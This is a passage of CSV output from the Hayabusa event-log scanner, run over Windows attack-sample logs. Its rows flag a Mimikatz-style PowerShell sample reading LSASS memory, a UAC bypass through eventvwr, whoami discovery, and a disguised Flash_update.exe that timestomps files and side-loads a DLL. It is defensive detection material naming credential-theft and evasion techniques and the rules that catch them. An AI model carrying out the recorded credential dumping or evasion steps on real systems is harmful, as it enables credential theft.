365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 
01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 
+09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File 
Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: 
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt 
Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami 
Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: 
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 
365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 
365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 
00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 
365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? 
